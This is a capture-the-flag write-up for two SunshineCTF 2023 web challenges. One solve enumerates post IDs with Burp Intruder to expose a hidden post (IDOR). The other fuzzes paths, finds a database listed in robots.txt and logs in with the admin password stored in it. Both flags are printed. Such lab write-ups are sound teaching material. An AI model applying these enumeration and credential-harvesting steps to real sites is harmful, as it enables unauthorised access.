Challenge 1: BeepBoop Blog
A few robots got together and started a blog! It’s full of posts that make absolutely no sense, but a little birdie told me that one of them left a secret in their drafts. Can you find it? https://beepboop.web.2023.sunshinectf.games
Intro
The challenge page is a blog that contains multiple posts from different robots.
We are a bunch of robots who like posting! We are chronically online, and our posts are not coherent. Enjoy our posts!
Solve
1. Click on the page & capture the request in the BurpSuite & take a look at response
{"hidden":false,"post":"Their history, surface. subterranean. Hosting rights demography, women, labour, and urban sectors.. (opened 2003 now celebrated. Several leftist 30,000 people, mostly in the bahamas. other popular sports. Of walter's or severely cold winter. Urbanized areas achievements are an estimated 7,000. Natalie zemon or vegan cat foods have been separated out. in 1874.. Divisions, and power plants.. Press (the chinatown. many of montana's smaller. Festival (iiff) form which emerged from the. Gradually closed 1606, which granted land to. Educational goals be 'prepared for luck' in the lower mandible crushes the. In lone disease by increasing.","user":"Robot #420"}
2. Send the request to intruder:
- Add position to the post number
- Payloads: Numbers from 0 to 1000 with step count 1
- Add
"hidden":trueinOptions > Grep-Match - Set attack type
sniper& start attack
GET /post/§0§/ HTTP/1.1
Host: beepboop.web.2023.sunshinectf.games
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://beepboop.web.2023.sunshinectf.games/
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
3. Got the flag in request 608:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 09 Oct 2023 17:36:58 GMT
Content-Type: application/json
Content-Length: 66
Connection: close
{"hidden":true,"post":"sun{wh00ps_4ll_IDOR}","user":"Robot #000"}
Solution
Bug: IDOR
Flag: sun{wh00ps_4ll_IDOR}
Challenge 2: Hotdog Stand
In the not-so-distant future, robots have taken over the fast-food industry. Infiltrate the robot hotdog stand to find out whatjobs still remain. https://hotdog.web.2023.sunshinectf.games
Intro
This challenge shows a login page with following content & asks for Robot ID and Access Code to get access.
Robot HotDog Stand Welcome, robot! Authenticate to access the exclusive robot menu. Humans, this interface isn’t for you!
Solve
1. Firstly, I thought it is a auth bypass bug with SQLi payloads. I tried, but NO result.
2. As a first recon step, I fuzzed endpoints on the URL using dirsearch & found /robots.txt
3. /robots.txt contains:
User-agent: * Disallow: /configs/ Disallow: /backups/ Disallow: /hotdog-database/
4. Found juicy endpoints: /configs/, /backups/, /hotdog-database/
5. After trying /hotdog-database/ endpoint, it gave robot_data.db file to dowload.
Solution
1. Open robot_data.db file in SQLite Viewer
2. Go to credentials table & it contains:
id: 1, username: hotdogstand, password: slicedpicklesandonions, role: admin
3. Login with above credentials to get the flag.
Flag
sun{5l1c3d_p1cKl35_4nd_0N10N2}